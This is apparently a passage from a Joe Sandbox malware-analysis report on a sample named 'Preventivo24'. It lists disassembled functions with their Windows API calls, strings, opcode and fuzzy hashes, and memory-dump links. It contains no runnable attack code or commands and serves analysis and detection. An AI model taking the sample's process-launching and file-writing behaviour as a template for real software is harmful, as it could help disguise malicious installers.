Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: MessageSend$Window$CreateLongRect
String ID: tooltips_class32
API String ID: 1954517558-1918224756
Opcode ID: ebe134d8259ad6b97ffb3c111e7999c299b41883d61ad8d866ab6ce9f5548c7b
Instruction ID: d30c855e9073e5b16bd3a98dac21f47e72d426027f1b882185d1cf931b7d7dee
Opcode Fuzzy Hash: ebe134d8259ad6b97ffb3c111e7999c299b41883d61ad8d866ab6ce9f5548c7b
Instruction Fuzzy Hash: 11913CB1940319AFDB14CFA4CC55BAEBBF9FB48700F10852AF516EB290DB74A904DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B565C0 Relevance: 16.7, APIs: 11, Instructions: 214fileCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00D30080,26FBC52C,00000000), ref: 00B565FC
EnterCriticalSection.KERNEL32(00000000,26FBC52C,00000000), ref: 00B56609
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00B5663B
FlushFileBuffers.KERNEL32(00000000,?,00000000,?,00000000), ref: 00B56644
WriteFile.KERNEL32(00000000,000000FF,?,?,00000000,00CA2700,00000001,?,00000000,?,00000000), ref: 00B566DC
FlushFileBuffers.KERNEL32(00000000,?,00000000,?,00000000), ref: 00B566E5
WriteFile.KERNEL32(00000000,000000EF,?,?,00000000,?,00000000,?,00000000), ref: 00B56728
FlushFileBuffers.KERNEL32(00000000,?,00000000,?,00000000), ref: 00B56731
WriteFile.KERNEL32(00000000,00C60ABD,78E9E84D,00000000,00000000,00CA56A4,00000002,?,00000000,?,00000000), ref: 00B5679E
FlushFileBuffers.KERNEL32(00000000,?,00000000,?,00000000), ref: 00B567A7
LeaveCriticalSection.KERNEL32(00000000,?,00000000,?,00000000), ref: 00B567E6

Part of subcall function 009EA880: FindResourceW.KERNEL32(00000000,?,00000006,00000000,?,00000000,009EAA2B,-00000010,?,?,?,26FBC52C,00000000,?,?), ref: 009EA8A3

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: File$BuffersFlushWrite$CriticalSection$EnterFindInitializeLeaveResource
String ID:
API String ID: 1900893598-0
Opcode ID: 7d41b15a3470efdfba253cb89cd1cce1a9e956263237b4f8e5f94296d7967c1b
Instruction ID: eebd1f3e48c39161fc068c497062d85e2a66c5b60c398107349f79b9efca2414
Opcode Fuzzy Hash: 7d41b15a3470efdfba253cb89cd1cce1a9e956263237b4f8e5f94296d7967c1b
Instruction Fuzzy Hash: D9719D35A04248AFDB02DF68CC49BADBBB5FF48324F544299F815A73A1DB31AD05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00BF5381 Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 487COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00BF5759

Strings

f, xrefs: 00BF5477
f, xrefs: 00BF5493
p, xrefs: 00BF549A
f, xrefs: 00BF54D9
p, xrefs: 00BF54E0
p, xrefs: 00BF547E
:, xrefs: 00BF544C

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: __aulldiv
String ID: :$f$f$f$p$p$p
API String ID: 3732870572-1434680307
Opcode ID: 87b9d343ca3209c7fc88f3f47259edb2ffb4044beba4fd5f19aa44b67a5d1869
Instruction ID: f2981bf0bc25eb52f2bb9b40a3db966cbf588d6d5d84bf99da38d0bd1f1f4926
Opcode Fuzzy Hash: 87b9d343ca3209c7fc88f3f47259edb2ffb4044beba4fd5f19aa44b67a5d1869
Instruction Fuzzy Hash: 72026775900A4CDADF348FA5D4486FDB7F6FB50B68FA48195D725AB280E7308E8C8B14

Uniqueness

Uniqueness Score: -1.00%

Function 00B3D3F0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 320processfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B3ECE0: GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000010), ref: 00B3ED0D

Part of subcall function 009F33C0: GetModuleHandleW.KERNEL32(Kernel32.dll,GetTempPath2W,?), ref: 009F34B7
Part of subcall function 009F33C0: GetProcAddress.KERNEL32(00000000), ref: 009F34BE

GetFileAttributesW.KERNEL32(?,?,00000003,?,00000001,?,00000000,00000000), ref: 00B3D598
SetFileAttributesW.KERNEL32(?,00000080), ref: 00B3D5AB
CopyFileW.KERNEL32(?,?,00000000), ref: 00B3D5B8

Part of subcall function 009EB400: GetProcessHeap.KERNEL32 ref: 009EB455

CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00B3D6FA
Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 00B3D710
CloseHandle.KERNEL32(?), ref: 00B3D731
Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 00B3D744

Strings

"%s" %s, xrefs: 00B3D62E

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: FileWow64$AttributesHandleModuleProcessRedirectionRevert$AddressCloseCopyCreateHeapNameProc
String ID: "%s" %s
API String ID: 2074715946-1070868581
Opcode ID: 8444b39a2c212cf79cc5d95aef0970b73e3bfed023d4250a27dbd46f5a79f3cf
Instruction ID: 00fdf70a4ad0172f1f4dc45d73676b99bdccd0feafe7dfacf771f2292c7391f1
Opcode Fuzzy Hash: 8444b39a2c212cf79cc5d95aef0970b73e3bfed023d4250a27dbd46f5a79f3cf
Instruction Fuzzy Hash: B7D19B31E00648DBDB15DFA8CC48BAEBBF1EF48314F248299E415AB2A1DB74AD45CF40

Uniqueness

Uniqueness Score: -1.00%

Function 009F6A00 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 283memoryCOMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 009F6A3E
SysAllocString.OLEAUT32(?), ref: 009F6A56
VariantInit.OLEAUT32(?), ref: 009F6A91
VariantClear.OLEAUT32(?), ref: 009F6AFA
VariantClear.OLEAUT32(?), ref: 009F6B08
VariantClear.OLEAUT32(?), ref: 009F6B16
VariantClear.OLEAUT32(?), ref: 009F6B27

Part of subcall function 009EB070: RtlAllocateHeap.NTDLL(?,00000000,?,26FBC52C,00000000,00C11B00,000000FF,?,?,00D25D3C,?,00000000,00B69FAB,8000000B,26FBC52C), ref: 009EB0BA

Strings

<body><h3 style="color:green;">Error loading resource:</h3><p style="white-space:nowrap">"%s"</p></body>, xrefs: 009F6BAB

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Variant$Clear$AllocAllocateHeapInitString
String ID: <body><h3 style="color:green;">Error loading resource:</h3><p style="white-space:nowrap">"%s"</p></body>
API String ID: 1547307772-1571955069
Opcode ID: 4839dd1446c14e15d0a0db7cbf2a2a02d988d0c417b3f3a0b3488b00926992c6
Instruction ID: 0e54e121eb8e5545855bee7209738aef1c91c0a674032320eeb4678d19f1a9d6
Opcode Fuzzy Hash: 4839dd1446c14e15d0a0db7cbf2a2a02d988d0c417b3f3a0b3488b00926992c6
Instruction Fuzzy Hash: 72A17E71904258EFCB00DFA8DC44BAEBBB8FF49324F14425AE911E7290DB74AA45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 009EED20 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 179processsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 009EB400: GetProcessHeap.KERNEL32 ref: 009EB455

CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 009EEE38
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 009EEE42
WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 009EEE54
GetExitCodeProcess.KERNEL32(?,?), ref: 009EEE71
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 009EEE7B
CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 009EEE88
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 009EEE92

Strings

"%s" %s, xrefs: 009EEDC0

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: ErrorLastProcess$CloseCodeCreateExitHandleHeapObjectSingleWait
String ID: "%s" %s
API String ID: 3234789809-1070868581
Opcode ID: a6d3cdf1a0bb1889ea79803a2a8c912822f8fcfb145afc6fc8b38a3142bc8970
Instruction ID: 2cf7bcdded91ae04e08f06492bdea96646708caf83b314519f19238d1f838e99
Opcode Fuzzy Hash: a6d3cdf1a0bb1889ea79803a2a8c912822f8fcfb145afc6fc8b38a3142bc8970
Instruction Fuzzy Hash: F0516B71E00659DFCB25CF65CC04BAEB7B9FF48714F20462AE925A7290E734AD81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B4B140 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 153libraryloaderCOMMON

Download Yara Rule

APIs

GetSystemDefaultLangID.KERNEL32 ref: 00B4B17E
GetUserDefaultLangID.KERNEL32 ref: 00B4B18B
LoadLibraryW.KERNEL32(kernel32.dll), ref: 00B4B19D
GetProcAddress.KERNEL32(00000000,GetSystemDefaultUILanguage), ref: 00B4B1AB
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 00B4B1CE

Strings

kernel32.dll, xrefs: 00B4B194
GetUserDefaultUILanguage, xrefs: 00B4B1C8
GetSystemDefaultUILanguage, xrefs: 00B4B1A5

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: AddressDefaultLangProc$LibraryLoadSystemUser
String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll
API String ID: 667524283-3528650308
Opcode ID: 9cd65ab96a51e8e32f2f4e81c72c2c7933c11a6652e08d10de28bb9b26fef075
Instruction ID: baece88f95771dbbf2fd1866deee2e8bbbe3bcc7abe74c92bc6bc0768205369b
Opcode Fuzzy Hash: 9cd65ab96a51e8e32f2f4e81c72c2c7933c11a6652e08d10de28bb9b26fef075
Instruction Fuzzy Hash: 2D51C3716043158FC704DF29D494A7EB7E2FBA8705F81096EF986C7290EB70D945DB41

Uniqueness

Uniqueness Score: -1.00%

Function 009E2C30 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 135COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00D3003C,00000000,26FBC52C,00000000,00C526B3,000000FF,?,26FBC52C), ref: 009E2DA3
GetLastError.KERNEL32(?,26FBC52C), ref: 009E2DAD

Strings

VolumeCostVolume, xrefs: 009E2C5D, 009E2D15
VolumeCostSize, xrefs: 009E2C67
VolumeCostAvailable, xrefs: 009E2C70
VolumeCostRequired, xrefs: 009E2C79
, xrefs: 009E2CFB
VolumeCostDifference, xrefs: 009E2C83

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: CountCriticalErrorInitializeLastSectionSpin
String ID: $VolumeCostAvailable$VolumeCostDifference$VolumeCostRequired$VolumeCostSize$VolumeCostVolume
API String ID: 439134102-2495611297
Opcode ID: 82138f09eb60c92340cd871c2d63fd2d9a3ad5adf4974a82ace73063241ba921
Instruction ID: 2c3d15b87caaf5257047e4f40e9a11d4581752a88dff2937632dc47d7e55bcc3
Opcode Fuzzy Hash: 82138f09eb60c92340cd871c2d63fd2d9a3ad5adf4974a82ace73063241ba921
Instruction Fuzzy Hash: 51519DB1900788DBCB15CFA5DD0979EBBFCFB08714F100669E914E7390E779A9488BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BEE310 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00BEE347
___except_validate_context_record.LIBVCRUNTIME ref: 00BEE34F
_ValidateLocalCookies.LIBCMT ref: 00BEE3D8
__IsNonwritableInCurrentImage.LIBCMT ref: 00BEE403
_ValidateLocalCookies.LIBCMT ref: 00BEE458
___vcrt_initialize_locks.LIBVCRUNTIME ref: 00BEE46E
___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00BEE483

Strings

csm, xrefs: 00BEE3ED

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record___vcrt_initialize_locks___vcrt_uninitialize_locks
String ID: csm
API String ID: 1385549066-1018135373
Opcode ID: b52277b1435d97f083447235cd8954ca71c8d527f2eb80da43f1a006cbe9a08c
Instruction ID: 36852ff7760806c5c6494843684fb39b181041706ac4e6b4089e0eb95100a89c
Opcode Fuzzy Hash: b52277b1435d97f083447235cd8954ca71c8d527f2eb80da43f1a006cbe9a08c
Instruction Fuzzy Hash: 6641F634A002899FCF10DF6AC880AAE7BF5EF45314F1485E5F9286B3A2D731D905CB91

Uniqueness

Uniqueness Score: -1.00%

Function 009F8A00 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 115COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00D3536C,26FBC52C,00000000,?,?,?,?,?,?,009F8169,00C1530D,000000FF), ref: 009F8A3D
LoadCursorW.USER32(00000000,00007F00), ref: 009F8AB8
LoadCursorW.USER32(00000000,00007F00), ref: 009F8B60
LeaveCriticalSection.KERNEL32(00D3536C), ref: 009F8BB3

Strings

WM_ATLGETCONTROL, xrefs: 009F8A52
WM_ATLGETHOST, xrefs: 009F8A43
AtlAxWin140, xrefs: 009F8A6B, 009F8AD3
AtlAxWinLic140, xrefs: 009F8B1D, 009F8B77

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: CriticalCursorLoadSection$EnterLeave
String ID: AtlAxWin140$AtlAxWinLic140$WM_ATLGETCONTROL$WM_ATLGETHOST
API String ID: 3727441302-1940731034
Opcode ID: f2dc79008acd325dd5cf6a5ded5092e31100ff379529be6b1bf8a330a6acb726
Instruction ID: 350b0b07de3db64bb763d4f3e1e3137359d603a7ba2e101ab6488760130dd414
Opcode Fuzzy Hash: f2dc79008acd325dd5cf6a5ded5092e31100ff379529be6b1bf8a330a6acb726
Instruction Fuzzy Hash: B25102B0D04309EFDB11DFA8D848BAEBBB8FB08714F10056AE511F7390DBB55A058BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00B69410 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 373fileCOMMON

Download Yara Rule

APIs

Part of subcall function 009EB400: GetProcessHeap.KERNEL32 ref: 009EB455

DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B6953F
CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00B69591
ReadFile.KERNEL32(00000000,?,000003FF,?,00000000), ref: 00B695D3
ReadFile.KERNEL32(00000000,00000000,000003FF,00000000,00000000,00000000), ref: 00B6961E
CloseHandle.KERNEL32(00000000), ref: 00B696AE
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00B69836

Strings

--verbose --log-file="%s" --remove-pack-file "%s" "%s", xrefs: 00B694CF

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: File$DeleteRead$CloseCreateHandleHeapProcess
String ID: --verbose --log-file="%s" --remove-pack-file "%s" "%s"
API String ID: 70679524-3685554107
Opcode ID: b0f158470c3439f3f2eeb32eae4a501c0ef7ff4962e7f09111a203648b48901b
Instruction ID: 76eb2f518004ace4e96e0c1863565d5010a23c89e5535666f4ee91d54178a8ce
Opcode Fuzzy Hash: b0f158470c3439f3f2eeb32eae4a501c0ef7ff4962e7f09111a203648b48901b
Instruction Fuzzy Hash: D1E19071A002189FDB11DB28CC94BADB7F9EF49314F1481E8E619A7391DB34AE85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00B02500 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 286fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000), ref: 00B025FF
CloseHandle.KERNEL32(00000000), ref: 00B02629
WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,?,?), ref: 00B0266A
CloseHandle.KERNEL32(?), ref: 00B026DD

Strings

.bat, xrefs: 00B02551
EXE, xrefs: 00B02556
open, xrefs: 00B0270A

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: CloseFileHandle$CreateWrite
